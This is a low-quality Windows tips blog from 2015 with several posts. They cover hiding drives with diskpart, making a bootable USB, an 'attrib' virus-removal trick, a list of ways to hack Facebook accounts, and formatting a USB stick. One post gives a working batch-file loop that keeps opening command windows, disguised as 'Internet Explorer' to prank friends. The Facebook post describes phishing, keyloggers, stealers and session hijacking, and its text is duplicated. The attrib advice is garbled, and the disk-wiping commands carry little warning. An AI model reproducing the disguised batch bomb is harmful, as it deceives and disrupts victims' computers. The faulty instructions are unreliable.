Thursday, January 29, 2015
Tuesday, January 27, 2015
Sunday, January 25, 2015
This is Possible to hide any drive in your PC using command prompt
This is Possible to hide any drive in your PC using command prompt. follow the below simple steps. Try this trick yourself and see the magic :D
Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt
or type "cmd" in search.
Step 2. In the Command Prompt, type Diskpart and Press enter key. If UAC (User Account Control), dialog-box prompts than click Yes.
Step 3. Then type List Volume and press enter, this will show the list of all your PC drives.
Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 6 (i.e. Volume Number) or by typing Select Volume G(i.e. Drive letter) it is possible in both way
Step 5. To hide your drive, type Remove Letter G. Here, G is the drive letter. You can use any drive letter you want.
How To Unhide Hidden Drive
Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.
Step 2. To show the hidden drive type Assign Letter G and Press enter, now you can view G: drive in explorer. open below Image and see.
Saturday, January 24, 2015
How to Make virus damage your computer
Step 1: NotePad
First you need to open Notepad.
You can go to the start menu and Click "All Programs", Then find the Folder "Accessories"
and "Notepad" should be in that folder.
Or you can open the start menu and type "Notepad" and click enter and Notepad will open.
Go To Next Step---------------------------------------->>>>>
Step 2: The Typing Part
Type in Notepad-
@echo off
:a
Start
Start
Start
Start
Start
Start
goto :a
What this will do is Open CMD six times and then repeat itself. Over and Over. You cant stop it. SO DONT TRY IT ON YOUR COMPUTER!!!
Step 3: Saving
When you save, Go to "File", "Save As", and save it as "Internet Explorer.bat". Where it says "FileType" Select "All Files" or it wont work!!!
Make Sure you save it to the desktop!!!!!!!!!
Step 4: Changing the Icon
Next you need to change the icon to look like "Internet Explorer".To do this you need to right click the Icon and go down to "Create Shortcut" and then rename it to "Internet Explorer". Then right click it and go down to "Properties" and select "Change Icon".Find the Internet Explorer Icon and click it and then click "Apply".
Put the original Batch File in a random folder on the desktop. So they cant see it.
Step 5: Opening
I Recommend you do not do this on your computer.This is very funny to do to friends.DO NOT ABUSE THIS HACK. FOR EDUCATIONAL PURPOSES ONLY!!!!!!!!
Thank You and Please Comment!!!!!!!!!!!!!
Friday, January 23, 2015
create boot in usb with the help of command
HOW TO MAKE BOOTABLE (USB)
Today I tell you how to make boot in usb with the help of cmd.SOME (CMD) USED IN
1: Click on start button open start menu type in search (CMD).2:Double click on (CMD) when open cmd you type command key.
3:disk part (press enter)
New (CMD) window appear on screen
4:listdisk (press enter)
5:select disk 1 (press enter)
6:clean (press enter)
7:creat partition primary (press enter)
8:format fs=ntfs quick (press enter)
9:active (press enter)
10:exit (press enter)
This way to make boot in any (USB).
Wednesday, January 21, 2015
how to remove viruses in your hard disk
Today my topic on (VIRUSES)
how to remove viruses in your hard disk.mostly hard disk corrupt from viruses.you remove viruses in your hard disk.Used this command.(CMD) REMOVE "VIRUSES"
1: Click on start button open start menu type in search (CMD).2:Double click on (CMD) when open cmd you type command key.
3: attrib -h -r -s /s /d k:*.*_
4: -h -r -s /s /d k:*.*_ your hard disk name for example: -e -d -f /f /d k:*.*_
NOW ENJOY THIS TRICK
online software Free provider soft&more tricks: Hack facebook account with the help of 10 differen...
online software Free provider soft&more tricks: Hack facebook account with the help of 10 differen...: 1. Phishing Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out...
Tuesday, January 20, 2015
Hack facebook account with the help of 10 different tricks
1. Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.2. Key logging
Key logging is the easiest way to hack a Facebook password. Key logging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Key logger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.3. Stealer's
Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.4. Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.5. Side jacking With Fire sheep
Side jacking attack went common in late 2010, however it's still popular now a days. Fire sheep is widely used to carry out side jacking attacks. Fire sheep only works when the attacker and victim is on the same WiFi network. A side jacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold.7. DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.8. USB Hacking
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.9. Man In the Middle Attacks
If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.10. Bot nets
Bot nets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Bot net is basically a collection of compromised computer. The infection process is same as the key logging, however a Bot net gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Bot nets include Spy1. Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.2. Key logging
Key logging is the easiest way to hack a Facebook password. Key logging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Key logger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.3. Stealer's
Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.4. Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.5. Side jacking With Fire sheep
Side jacking attack went common in late 2010, however it's still popular now a days. Fire sheep is widely used to carry out side jacking attacks. Fire sheep only works when the attacker and victim is on the same WiFi network. A side jacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold.7. DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.8. USB Hacking
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.9. Man In the Middle Attacks
If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.10. Bot nets
Bot nets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Bot net is basically a collection of compromised computer. The infection process is same as the key logging, however a Bot net gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Bot nets include eye and Zeus.Monday, January 19, 2015
usb unable to format write protected
Tips & tricks
HOW TO FORMAT USB1. Turn off your computer or laptop
2. Insert USB memory Stick into your laptop or Computer
3. Re-start your PC and then start pressing (F8) key then to open Advanced Boot Options screen
4. Select Safe Mode with Command Prompt
5. After loading files if your USB Memory Stick drive letter is (G) for example then write as
6. C:\windows\system32>G: and press enter
7. G:\>format G: and press enter
8. If ask you (Y/N) then press (Y) and press enter
9. This should do the trick.
Subscribe to:
Posts (Atom)